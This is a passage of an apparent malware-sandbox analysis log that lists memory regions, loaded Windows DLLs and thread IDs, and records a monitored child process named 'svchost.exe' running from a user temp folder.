filename = "\\Windows\\System32\\uxtheme.dll" (normalized: "c:\\windows\\system32\\uxtheme.dll") Region: id = 680 start_va = 0x7fefbb80000 end_va = 0x7fefbcabfff monitored = 0 entry_point = 0x7fefbb894bc region_type = mapped_file name = "propsys.dll" filename = "\\Windows\\System32\\propsys.dll" (normalized: "c:\\windows\\system32\\propsys.dll") Region: id = 681 start_va = 0x7fefbcb0000 end_va = 0x7fefbcccfff monitored = 0 entry_point = 0x7fefbcb1ef4 region_type = mapped_file name = "samlib.dll" filename = "\\Windows\\System32\\samlib.dll" (normalized: "c:\\windows\\system32\\samlib.dll") Region: id = 682 start_va = 0x7fefbd00000 end_va = 0x7fefbef3fff monitored = 0 entry_point = 0x7fefbe8c924 region_type = mapped_file name = "comctl32.dll" filename = "\\Windows\\winsxs\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_fa396087175ac9ac\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_fa396087175ac9ac\\comctl32.dll") Region: id = 683 start_va = 0x7fefc390000 end_va = 0x7fefc39bfff monitored = 0 entry_point = 0x7fefc391064 region_type = mapped_file name = "version.dll" filename = "\\Windows\\System32\\version.dll" (normalized: "c:\\windows\\system32\\version.dll") Region: id = 684 start_va = 0x7fefc3a0000 end_va = 0x7fefc45afff monitored = 0 entry_point = 0x7fefc3a6de0 region_type = mapped_file name = "firewallapi.dll" filename = "\\Windows\\System32\\FirewallAPI.dll" (normalized: "c:\\windows\\system32\\firewallapi.dll") Region: id = 685 start_va = 0x7fefc460000 end_va = 0x7fefc466fff monitored = 0 entry_point = 0x7fefc4614b0 region_type = mapped_file name = "wshtcpip.dll" filename = "\\Windows\\System32\\WSHTCPIP.DLL" (normalized: "c:\\windows\\system32\\wshtcpip.dll") Region: id = 686 start_va = 0x7fefc550000 end_va = 0x7fefc56afff monitored = 0 entry_point = 0x7fefc552068 region_type = mapped_file name = "gpapi.dll" filename = "\\Windows\\System32\\gpapi.dll" (normalized: "c:\\windows\\system32\\gpapi.dll") Region: id = 687 start_va = 0x7fefc570000 end_va = 0x7fefc58dfff monitored = 0 entry_point = 0x7fefc5713b8 region_type = mapped_file name = "userenv.dll" filename = "\\Windows\\System32\\userenv.dll" (normalized: "c:\\windows\\system32\\userenv.dll") Region: id = 688 start_va = 0x7fefc590000 end_va = 0x7fefc5a1fff monitored = 0 entry_point = 0x7fefc591060 region_type = mapped_file name = "devrtl.dll" filename = "\\Windows\\System32\\devrtl.dll" (normalized: "c:\\windows\\system32\\devrtl.dll") Region: id = 689 start_va = 0x7fefc5b0000 end_va = 0x7fefc5cefff monitored = 0 entry_point = 0x7fefc5b5c68 region_type = mapped_file name = "spinf.dll" filename = "\\Windows\\System32\\SPInf.dll" (normalized: "c:\\windows\\system32\\spinf.dll") Region: id = 690 start_va = 0x7fefc680000 end_va = 0x7fefc6b8fff monitored = 0 entry_point = 0x7fefc68c0f0 region_type = mapped_file name = "ubpm.dll" filename = "\\Windows\\System32\\ubpm.dll" (normalized: "c:\\windows\\system32\\ubpm.dll") Region: id = 691 start_va = 0x7fefc6c0000 end_va = 0x7fefc6c9fff monitored = 0 entry_point = 0x7fefc6c3cb8 region_type = mapped_file name = "credssp.dll" filename = "\\Windows\\System32\\credssp.dll" (normalized: "c:\\windows\\system32\\credssp.dll") Region: id = 692 start_va = 0x7fefc6d0000 end_va = 0x7fefc6dcfff monitored = 0 entry_point = 0x7fefc6d1348 region_type = mapped_file name = "pcwum.dll" filename = "\\Windows\\System32\\pcwum.dll" (normalized: "c:\\windows\\system32\\pcwum.dll") Region: id = 693 start_va = 0x7fefc7c0000 end_va = 0x7fefc806fff monitored = 0 entry_point = 0x7fefc7c1064 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 694 start_va = 0x7fefc8b0000 end_va = 0x7fefc8dffff monitored = 0 entry_point = 0x7fefc8b194c region_type = mapped_file name = "logoncli.dll" filename = "\\Windows\\System32\\logoncli.dll" (normalized: "c:\\windows\\system32\\logoncli.dll") Region: id = 695 start_va = 0x7fefc8e0000 end_va = 0x7fefc93afff monitored = 0 entry_point = 0x7fefc8e6940 region_type = mapped_file name = "dnsapi.dll" filename = "\\Windows\\System32\\dnsapi.dll" (normalized: "c:\\windows\\system32\\dnsapi.dll") Region: id = 696 start_va = 0x7fefca50000 end_va = 0x7fefca56fff monitored = 0 entry_point = 0x7fefca5142c region_type = mapped_file name = "wship6.dll" filename = "\\Windows\\System32\\wship6.dll" (normalized: "c:\\windows\\system32\\wship6.dll") Region: id = 697 start_va = 0x7fefca60000 end_va = 0x7fefcab4fff monitored = 0 entry_point = 0x7fefca61054 region_type = mapped_file name = "mswsock.dll" filename = "\\Windows\\System32\\mswsock.dll" (normalized: "c:\\windows\\system32\\mswsock.dll") Region: id = 698 start_va = 0x7fefcac0000 end_va = 0x7fefcad7fff monitored = 0 entry_point = 0x7fefcac3b48 region_type = mapped_file name = "cryptsp.dll" filename = "\\Windows\\System32\\cryptsp.dll" (normalized: "c:\\windows\\system32\\cryptsp.dll") Region: id = 699 start_va = 0x7fefcbd0000 end_va = 0x7fefcc01fff monitored = 0 entry_point = 0x7fefcbd144c region_type = mapped_file name = "netjoin.dll" filename = "\\Windows\\System32\\netjoin.dll" (normalized: "c:\\windows\\system32\\netjoin.dll") Region: id = 700 start_va = 0x7fefcc10000 end_va = 0x7fefcc17fff monitored = 0 entry_point = 0x7fefcc12a6c region_type = mapped_file name = "wmsgapi.dll" filename = "\\Windows\\System32\\wmsgapi.dll" (normalized: "c:\\windows\\system32\\wmsgapi.dll") Region: id = 701 start_va = 0x7fefcc20000 end_va = 0x7fefcc29fff monitored = 0 entry_point = 0x7fefcc23b40 region_type = mapped_file name = "sysntfy.dll" filename = "\\Windows\\System32\\sysntfy.dll" (normalized: "c:\\windows\\system32\\sysntfy.dll") Region: id = 702 start_va = 0x7fefcc30000 end_va = 0x7fefcc51fff monitored = 0 entry_point = 0x7fefcc35d30 region_type = mapped_file name = "bcrypt.dll" filename = "\\Windows\\System32\\bcrypt.dll" (normalized: "c:\\windows\\system32\\bcrypt.dll") Region: id = 703 start_va = 0x7fefccb0000 end_va = 0x7fefccdefff monitored = 0 entry_point = 0x7fefccb1064 region_type = mapped_file name = "authz.dll" filename = "\\Windows\\System32\\authz.dll" (normalized: "c:\\windows\\system32\\authz.dll") Region: id = 704 start_va = 0x7fefccf0000 end_va = 0x7fefcd5cfff monitored = 0 entry_point = 0x7fefccf1010 region_type = mapped_file name = "wevtapi.dll" filename = "\\Windows\\System32\\wevtapi.dll" (normalized: "c:\\windows\\system32\\wevtapi.dll") Region: id = 705 start_va = 0x7fefcd60000 end_va = 0x7fefcd73fff monitored = 0 entry_point = 0x7fefcd64160 region_type = mapped_file name = "cryptdll.dll" filename = "\\Windows\\System32\\cryptdll.dll" (normalized: "c:\\windows\\system32\\cryptdll.dll") Region: id = 706 start_va = 0x7fefcfc0000 end_va = 0x7fefcfe2fff monitored = 0 entry_point = 0x7fefcfc1198 region_type = mapped_file name = "srvcli.dll" filename = "\\Windows\\System32\\srvcli.dll" (normalized: "c:\\windows\\system32\\srvcli.dll") Region: id = 707 start_va = 0x7fefd060000 end_va = 0x7fefd06afff monitored = 0 entry_point = 0x7fefd061030 region_type = mapped_file name = "secur32.dll" filename = "\\Windows\\System32\\secur32.dll" (normalized: "c:\\windows\\system32\\secur32.dll") Region: id = 708 start_va = 0x7fefd090000 end_va = 0x7fefd0b4fff monitored = 0 entry_point = 0x7fefd099658 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\System32\\sspicli.dll" (normalized: "c:\\windows\\system32\\sspicli.dll") Region: id = 709 start_va = 0x7fefd0c0000 end_va = 0x7fefd0cefff monitored = 0 entry_point = 0x7fefd0c1010 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\System32\\cryptbase.dll" (normalized: "c:\\windows\\system32\\cryptbase.dll") Region: id = 710 start_va = 0x7fefd0d0000 end_va = 0x7fefd160fff monitored = 0 entry_point = 0x7fefd0d1440 region_type = mapped_file name = "sxs.dll" filename = "\\Windows\\System32\\sxs.dll" (normalized: "c:\\windows\\system32\\sxs.dll") Region: id = 711 start_va = 0x7fefd170000 end_va = 0x7fefd1acfff monitored = 0 entry_point = 0x7fefd1718f4 region_type = mapped_file name = "winsta.dll" filename = "\\Windows\\System32\\winsta.dll" (normalized: "c:\\windows\\system32\\winsta.dll") Region: id = 712 start_va = 0x7fefd1b0000 end_va = 0x7fefd1c3fff monitored = 0 entry_point = 0x7fefd1b10e0 region_type = mapped_file name = "rpcrtremote.dll" filename = "\\Windows\\System32\\RpcRtRemote.dll" (normalized: "c:\\windows\\system32\\rpcrtremote.dll") Region: id = 713 start_va = 0x7fefd1d0000 end_va = 0x7fefd1defff monitored = 0 entry_point = 0x7fefd1d19b0 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\System32\\profapi.dll" (normalized: "c:\\windows\\system32\\profapi.dll") Region: id = 714 start_va = 0x7fefd270000 end_va = 0x7fefd27efff monitored = 0 entry_point = 0x7fefd271020 region_type = mapped_file name = "msasn1.dll" filename = "\\Windows\\System32\\msasn1.dll" (normalized: "c:\\windows\\system32\\msasn1.dll") Region: id = 715 start_va = 0x7fefd280000 end_va = 0x7fefd2bafff monitored = 0 entry_point = 0x7fefd281324 region_type = mapped_file name = "wintrust.dll" filename = "\\Windows\\System32\\wintrust.dll" (normalized: "c:\\windows\\system32\\wintrust.dll") Region: id = 716 start_va = 0x7fefd2c0000 end_va = 0x7fefd42cfff monitored = 0 entry_point = 0x7fefd2c10b4 region_type = mapped_file name = "crypt32.dll" filename = "\\Windows\\System32\\crypt32.dll" (normalized: "c:\\windows\\system32\\crypt32.dll") Region: id = 717 start_va = 0x7fefd4d0000 end_va = 0x7fefd53bfff monitored = 0 entry_point = 0x7fefd4d2780 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 718 start_va = 0x7fefd540000 end_va = 0x7fefd575fff monitored = 0 entry_point = 0x7fefd541474 region_type = mapped_file name = "cfgmgr32.dll" filename = "\\Windows\\System32\\cfgmgr32.dll" (normalized: "c:\\windows\\system32\\cfgmgr32.dll") Region: id = 719 start_va = 0x7fefd580000 end_va = 0x7fefd599fff monitored = 0 entry_point = 0x7fefd581558 region_type = mapped_file name = "devobj.dll" filename = "\\Windows\\System32\\devobj.dll" (normalized: "c:\\windows\\system32\\devobj.dll") Region: id = 720 start_va = 0x7fefd5a0000 end_va = 0x7fefd6ccfff monitored = 0 entry_point = 0x7fefd5eed50 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 721 start_va = 0x7fefd6d0000 end_va = 0x7fefd721fff monitored = 0 entry_point = 0x7fefd6d10d4 region_type = mapped_file name = "wldap32.dll" filename = "\\Windows\\System32\\Wldap32.dll" (normalized: "c:\\windows\\system32\\wldap32.dll") Region: id = 722 start_va = 0x7fefd730000 end_va = 0x7fefd932fff monitored = 0 entry_point = 0x7fefd753330 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 723 start_va = 0x7fefd940000 end_va = 0x7fefd94dfff monitored = 0 entry_point = 0x7fefd941080 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 724 start_va = 0x7fefdd50000 end_va = 0x7fefde18fff monitored = 0 entry_point = 0x7fefddca874 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 725 start_va = 0x7fefde20000 end_va = 0x7fefeba7fff monitored = 0 entry_point = 0x7fefde9cebc region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\System32\\shell32.dll" (normalized: "c:\\windows\\system32\\shell32.dll") Region: id = 726 start_va = 0x7fefebb0000 end_va = 0x7fefec4efff monitored = 0 entry_point = 0x7fefebb25a0 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 727 start_va = 0x7fefec50000 end_va = 0x7fefec7dfff monitored = 0 entry_point = 0x7fefec51010 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 728 start_va = 0x7fefec80000 end_va = 0x7fefecf0fff monitored = 0 entry_point = 0x7fefec91e20 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll") Region: id = 729 start_va = 0x7fefed00000 end_va = 0x7fefed66fff monitored = 0 entry_point = 0x7fefed0b03c region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 730 start_va = 0x7fefed70000 end_va = 0x7fefed77fff monitored = 0 entry_point = 0x7fefed71504 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 731 start_va = 0x7fefed80000 end_va = 0x7fefee88fff monitored = 0 entry_point = 0x7fefed81064 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 732 start_va = 0x7feff060000 end_va = 0x7feff13afff monitored = 0 entry_point = 0x7feff080760 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 733 start_va = 0x7feff140000 end_va = 0x7feff1d8fff monitored = 0 entry_point = 0x7feff141c10 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\System32\\clbcatq.dll" (normalized: "c:\\windows\\system32\\clbcatq.dll") Region: id = 734 start_va = 0x7feff1e0000 end_va = 0x7feff1fefff monitored = 0 entry_point = 0x7feff1e60e8 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 735 start_va = 0x7feff280000 end_va = 0x7feff2ccfff monitored = 0 entry_point = 0x7feff281070 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll") Region: id = 736 start_va = 0x7feff2d0000 end_va = 0x7feff3a6fff monitored = 0 entry_point = 0x7feff2d3274 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 737 start_va = 0x7feff3b0000 end_va = 0x7feff586fff monitored = 0 entry_point = 0x7feff3b1010 region_type = mapped_file name = "setupapi.dll" filename = "\\Windows\\System32\\setupapi.dll" (normalized: "c:\\windows\\system32\\setupapi.dll") Region: id = 738 start_va = 0x7feff5a0000 end_va = 0x7feff5a0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 739 start_va = 0x7fffff4c000 end_va = 0x7fffff4dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff4c000" filename = "" Region: id = 740 start_va = 0x7fffff4e000 end_va = 0x7fffff4ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff4e000" filename = "" Region: id = 741 start_va = 0x7fffff50000 end_va = 0x7fffff51fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff50000" filename = "" Region: id = 742 start_va = 0x7fffff52000 end_va = 0x7fffff53fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff52000" filename = "" Region: id = 743 start_va = 0x7fffff54000 end_va = 0x7fffff55fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff54000" filename = "" Region: id = 744 start_va = 0x7fffff56000 end_va = 0x7fffff57fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff56000" filename = "" Region: id = 745 start_va = 0x7fffff58000 end_va = 0x7fffff59fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff58000" filename = "" Region: id = 746 start_va = 0x7fffff5a000 end_va = 0x7fffff5bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff5a000" filename = "" Region: id = 747 start_va = 0x7fffff5c000 end_va = 0x7fffff5dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff5c000" filename = "" Region: id = 748 start_va = 0x7fffff5e000 end_va = 0x7fffff5ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff5e000" filename = "" Region: id = 749 start_va = 0x7fffff60000 end_va = 0x7fffff61fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff60000" filename = "" Region: id = 750 start_va = 0x7fffff62000 end_va = 0x7fffff63fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff62000" filename = "" Region: id = 751 start_va = 0x7fffff64000 end_va = 0x7fffff65fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff64000" filename = "" Region: id = 752 start_va = 0x7fffff66000 end_va = 0x7fffff67fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff66000" filename = "" Region: id = 753 start_va = 0x7fffff68000 end_va = 0x7fffff69fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff68000" filename = "" Region: id = 754 start_va = 0x7fffff6a000 end_va = 0x7fffff6bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff6a000" filename = "" Region: id = 755 start_va = 0x7fffff6c000 end_va = 0x7fffff6dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff6c000" filename = "" Region: id = 756 start_va = 0x7fffff6e000 end_va = 0x7fffff6ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff6e000" filename = "" Region: id = 757 start_va = 0x7fffff70000 end_va = 0x7fffff71fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff70000" filename = "" Region: id = 758 start_va = 0x7fffff72000 end_va = 0x7fffff73fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff72000" filename = "" Region: id = 759 start_va = 0x7fffff74000 end_va = 0x7fffff75fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff74000" filename = "" Region: id = 760 start_va = 0x7fffff76000 end_va = 0x7fffff77fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff76000" filename = "" Region: id = 761 start_va = 0x7fffff78000 end_va = 0x7fffff79fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff78000" filename = "" Region: id = 762 start_va = 0x7fffff7a000 end_va = 0x7fffff7bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff7a000" filename = "" Region: id = 763 start_va = 0x7fffff7c000 end_va = 0x7fffff7dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff7c000" filename = "" Region: id = 764 start_va = 0x7fffff7e000 end_va = 0x7fffff7ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff7e000" filename = "" Region: id = 765 start_va = 0x7fffff80000 end_va = 0x7fffff81fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff80000" filename = "" Region: id = 766 start_va = 0x7fffff82000 end_va = 0x7fffff83fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff82000" filename = "" Region: id = 767 start_va = 0x7fffff84000 end_va = 0x7fffff85fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff84000" filename = "" Region: id = 768 start_va = 0x7fffff86000 end_va = 0x7fffff87fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff86000" filename = "" Region: id = 769 start_va = 0x7fffff88000 end_va = 0x7fffff89fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff88000" filename = "" Region: id = 770 start_va = 0x7fffff8a000 end_va = 0x7fffff8bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff8a000" filename = "" Region: id = 771 start_va = 0x7fffff8c000 end_va = 0x7fffff8dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff8c000" filename = "" Region: id = 772 start_va = 0x7fffff8e000 end_va = 0x7fffff8ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff8e000" filename = "" Region: id = 773 start_va = 0x7fffff90000 end_va = 0x7fffff91fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff90000" filename = "" Region: id = 774 start_va = 0x7fffff92000 end_va = 0x7fffff93fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff92000" filename = "" Region: id = 775 start_va = 0x7fffff94000 end_va = 0x7fffff95fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff94000" filename = "" Region: id = 776 start_va = 0x7fffff96000 end_va = 0x7fffff97fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff96000" filename = "" Region: id = 777 start_va = 0x7fffff98000 end_va = 0x7fffff99fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff98000" filename = "" Region: id = 778 start_va = 0x7fffff9a000 end_va = 0x7fffff9bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff9a000" filename = "" Region: id = 779 start_va = 0x7fffff9c000 end_va = 0x7fffff9dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff9c000" filename = "" Region: id = 780 start_va = 0x7fffff9e000 end_va = 0x7fffff9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff9e000" filename = "" Region: id = 781 start_va = 0x7fffffa0000 end_va = 0x7fffffa1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffa0000" filename = "" Region: id = 782 start_va = 0x7fffffa2000 end_va = 0x7fffffa3fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffa2000" filename = "" Region: id = 783 start_va = 0x7fffffa4000 end_va = 0x7fffffa5fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffa4000" filename = "" Region: id = 784 start_va = 0x7fffffa6000 end_va = 0x7fffffa7fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffa6000" filename = "" Region: id = 785 start_va = 0x7fffffa8000 end_va = 0x7fffffa9fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffa8000" filename = "" Region: id = 786 start_va = 0x7fffffaa000 end_va = 0x7fffffabfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffaa000" filename = "" Region: id = 787 start_va = 0x7fffffac000 end_va = 0x7fffffadfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffac000" filename = "" Region: id = 788 start_va = 0x7fffffae000 end_va = 0x7fffffaffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffae000" filename = "" Region: id = 789 start_va = 0x7fffffb0000 end_va = 0x7fffffd2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000007fffffb0000" filename = "" Region: id = 790 start_va = 0x7fffffd4000 end_va = 0x7fffffd5fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffd4000" filename = "" Region: id = 791 start_va = 0x7fffffd6000 end_va = 0x7fffffd7fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffd6000" filename = "" Region: id = 792 start_va = 0x7fffffd8000 end_va = 0x7fffffd8fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffd8000" filename = "" Region: id = 793 start_va = 0x7fffffda000 end_va = 0x7fffffdbfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffda000" filename = "" Region: id = 794 start_va = 0x7fffffdc000 end_va = 0x7fffffddfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffdc000" filename = "" Region: id = 795 start_va = 0x7fffffde000 end_va = 0x7fffffdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffde000" filename = "" Region: id = 1208 start_va = 0x1bb0000 end_va = 0x1c2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001bb0000" filename = "" Region: id = 1209 start_va = 0x2140000 end_va = 0x21bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002140000" filename = "" Region: id = 1327 start_va = 0x1690000 end_va = 0x170ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001690000" filename = "" Region: id = 1328 start_va = 0x2520000 end_va = 0x259ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002520000" filename = "" Region: id = 1329 start_va = 0x7fffffd4000 end_va = 0x7fffffd5fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffd4000" filename = "" Region: id = 1330 start_va = 0x7fffffd6000 end_va = 0x7fffffd7fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffd6000" filename = "" Thread: id = 10 os_tid = 0xf5c Thread: id = 11 os_tid = 0xef0 Thread: id = 12 os_tid = 0xeec Thread: id = 13 os_tid = 0xe28 Thread: id = 14 os_tid = 0xe24 Thread: id = 15 os_tid = 0xdb4 Thread: id = 16 os_tid = 0xd94 Thread: id = 17 os_tid = 0x824 Thread: id = 18 os_tid = 0x718 Thread: id = 19 os_tid = 0x730 Thread: id = 20 os_tid = 0x300 Thread: id = 21 os_tid = 0x644 Thread: id = 22 os_tid = 0x394 Thread: id = 23 os_tid = 0x308 Thread: id = 24 os_tid = 0x3ac Thread: id = 25 os_tid = 0x670 Thread: id = 26 os_tid = 0x6ac Thread: id = 27 os_tid = 0x668 Thread: id = 28 os_tid = 0x2ac Thread: id = 29 os_tid = 0x72c Thread: id = 30 os_tid = 0x158 Thread: id = 31 os_tid = 0x648 Thread: id = 32 os_tid = 0x358 Thread: id = 33 os_tid = 0x6a0 Thread: id = 34 os_tid = 0x610 Thread: id = 35 os_tid = 0x6b4 Thread: id = 36 os_tid = 0x5c4 Thread: id = 37 os_tid = 0x6c4 Thread: id = 38 os_tid = 0x16c Thread: id = 39 os_tid = 0x63c Thread: id = 40 os_tid = 0x780 Thread: id = 41 os_tid = 0x758 Thread: id = 42 os_tid = 0x680 Thread: id = 43 os_tid = 0x720 Thread: id = 44 os_tid = 0x304 Thread: id = 45 os_tid = 0x320 Thread: id = 46 os_tid = 0x6a8 Thread: id = 47 os_tid = 0x65c Thread: id = 48 os_tid = 0x624 Thread: id = 49 os_tid = 0x620 Thread: id = 50 os_tid = 0x5fc Thread: id = 51 os_tid = 0x5ec Thread: id = 52 os_tid = 0x45c Thread: id = 53 os_tid = 0x458 Thread: id = 54 os_tid = 0x154 Thread: id = 55 os_tid = 0x364 Thread: id = 56 os_tid = 0x454 Thread: id = 57 os_tid = 0x450 Thread: id = 58 os_tid = 0x444 Thread: id = 59 os_tid = 0x1c0 Thread: id = 60 os_tid = 0x3f4 Thread: id = 61 os_tid = 0x3ec Thread: id = 62 os_tid = 0x3e0 Thread: id = 63 os_tid = 0x388 Thread: id = 64 os_tid = 0x374 Thread: id = 65 os_tid = 0x36c Thread: id = 78 os_tid = 0xfd8 Thread: id = 79 os_tid = 0xfdc Thread: id = 96 os_tid = 0xae0 Thread: id = 105 os_tid = 0xcc0 Thread: id = 106 os_tid = 0x17c Process: id = "3" image_name = "svchost.exe" filename = "c:\\users\\keecfmwgj\\appdata\\local\\temp\\5zjnws5lvhhy2g2\\svchost.exe" page_root = "0x3ea03000" os_pid = "0xf7c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0xf40" cmd_line = "\"C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\5ZJNWs5LVhHy2g2\\svchost.exe\" " cur_dir = "C:\\Users\\kEecfMwgj\\Desktop\\" os_username = "Q9IATRKPRH\\kEecfMwgj" bitness = "32" os_groups = "Q9IATRKPRH\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000f3d7" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 818 start_va = 0x10000 end_va = 0x2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 819 start_va = 0x30000 end_va = 0x31fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 820 start_va = 0x40000 end_va = 0x40fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 821 start_va = 0x50000 end_va = 0x8ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000050000" filename = "" Region: id = 822 start_va = 0x90000 end_va = 0x18ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000090000" filename 